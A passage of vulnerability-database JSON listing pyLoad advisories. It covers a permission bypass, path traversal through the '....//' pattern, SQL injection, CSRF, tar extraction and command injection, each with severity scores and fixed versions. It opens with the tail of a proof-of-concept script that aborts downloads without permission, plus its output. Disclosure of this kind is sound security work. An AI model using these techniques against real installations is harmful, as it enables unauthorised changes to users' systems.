s['role'] = int(Role.USER)\n s['perms'] = int(Perms.DELETE)\n\n r = c.post('/json/abort_link', json={'link_id': 999})\n\nprint('HTTP /json/abort_link:', r.status_code, r.get_data(as_text=True).strip())\nprint('calls:', f.calls)\n```\n\nObserved output:\n```text\nAPI auth (DELETE-only) stop_downloads: False\nHTTP /json/abort_link: 200 {\"response\":\"success\"}\ncalls: [('stop_downloads', [999])]\n```\n\n### Impact\nType:\n- Improper authorization / permission-bypass between WebUI and core API permission model.\n\nScope:\n- Horizontal privilege escalation among authenticated non-admin users.\n- Not admin takeover, but unauthorized execution of operations explicitly categorized as `MODIFY`.\n\nSecurity impact:\n- Integrity impact: unauthorized queue/file reordering by users lacking `MODIFY`.\n- Availability impact: unauthorized abort of active downloads by users lacking `MODIFY`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40071", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.12274", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40071" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:09:08Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40071", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40071" }, { "reference_url": "https://github.com/advisories/GHSA-rfgh-63mg-8pwm", "reference_id": "GHSA-rfgh-63mg-8pwm", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-rfgh-63mg-8pwm" } ], "fixed_packages": [], "aliases": [ "CVE-2026-40071", "GHSA-rfgh-63mg-8pwm" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hzu2-r32u-q7c7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37329?format=api", "vulnerability_id": "VCID-jxej-fugb-3ydh", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42314", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18687", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42314" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:33:35Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42314", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42314" }, { "reference_url": "https://github.com/advisories/GHSA-97r3-5w84-r4q8", "reference_id": "GHSA-97r3-5w84-r4q8", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-97r3-5w84-r4q8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-42314", "GHSA-97r3-5w84-r4q8", "PYSEC-2026-128" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jxej-fugb-3ydh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57825?format=api", "vulnerability_id": "VCID-mbkb-u95k-yfgc", "summary": "PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter\nThe parameter `add_links` in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55156", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18553", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55156" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/" } ], "url": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271" }, { "reference_url": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/" } ], "url": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55156", "reference_id": "CVE-2025-55156", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55156" }, { "reference_url": "https://github.com/advisories/GHSA-pwh4-6r3m-j2rf", "reference_id": "GHSA-pwh4-6r3m-j2rf", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-pwh4-6r3m-j2rf" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf", "reference_id": "GHSA-pwh4-6r3m-j2rf", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48575?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev91", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev91" } ], "aliases": [ "CVE-2025-55156", "GHSA-pwh4-6r3m-j2rf" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mbkb-u95k-yfgc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/36684?format=api", "vulnerability_id": "VCID-nbnk-6g72-3ybk", "summary": "pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-22416", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.05898", "scoring_system": "epss", "scoring_elements": "0.90778", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-22416" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/" } ], "url": "https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e" }, { "reference_url": "https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/" } ], "url": "https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-18T01:21:47Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22416", "reference_id": "CVE-2024-22416", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22416" }, { "reference_url": "https://github.com/advisories/GHSA-pgpj-v85q-h5fm", "reference_id": "GHSA-pgpj-v85q-h5fm", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pgpj-v85q-h5fm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38751?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev78", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev78" } ], "aliases": [ "CVE-2024-22416", "GHSA-pgpj-v85q-h5fm", "PYSEC-2024-17" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nbnk-6g72-3ybk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37277?format=api", "vulnerability_id": "VCID-ng6u-saxg-dbf9", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the _safe_extractall() function in src/pyload/plugins/extractors/UnTar.py uses os.path.commonprefix() for its path traversal check, which performs character-level string comparison rather than path-level comparison. This allows a specially crafted tar archive to write files outside the intended extraction directory. The correct function os.path.commonpath() was added to the codebase in the CVE-2026-32808 fix (commit 5f4f0fa) but was never applied to _safe_extractall(), making this an incomplete fix. This vulnerability is fixed in 0.5.0b3.dev97.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35592", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18392", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35592" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-mvwx-582f-56r7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:58:13Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-mvwx-582f-56r7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35592", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35592" }, { "reference_url": "https://github.com/advisories/GHSA-mvwx-582f-56r7", "reference_id": "GHSA-mvwx-582f-56r7", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-mvwx-582f-56r7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48581?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev97", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97" } ], "aliases": [ "CVE-2026-35592", "GHSA-mvwx-582f-56r7", "PYSEC-2026-124" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ng6u-saxg-dbf9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37330?format=api", "vulnerability_id": "VCID-p22h-1rtx-bkcy", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, when passing a folder name in the set_package_data() API function call inside the data object with key \"_folder\", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package. This vulnerability is fixed in 0.5.0b3.dev100.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42315", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.19111", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42315" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42315", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42315" }, { "reference_url": "https://github.com/advisories/GHSA-838g-gr43-qqg9", "reference_id": "GHSA-838g-gr43-qqg9", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-838g-gr43-qqg9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/50306?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev100", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100" } ], "aliases": [ "CVE-2026-42315", "GHSA-838g-gr43-qqg9", "PYSEC-2026-129" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p22h-1rtx-bkcy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46795?format=api", "vulnerability_id": "VCID-pgh8-2pmw-7ba7", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in pyload-ng.", "references": [ { "reference_url": "http://pyload.com", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-05-09T23:56:34Z/" } ], "url": "http://pyload.com" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-47890", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00343", "scoring_system": "epss", "scoring_elements": "0.57259", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-47890" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47890", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47890" }, { "reference_url": "https://github.com/advisories/GHSA-h73m-pcfw-25h2", "reference_id": "GHSA-h73m-pcfw-25h2", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-h73m-pcfw-25h2" }, { "reference_url": 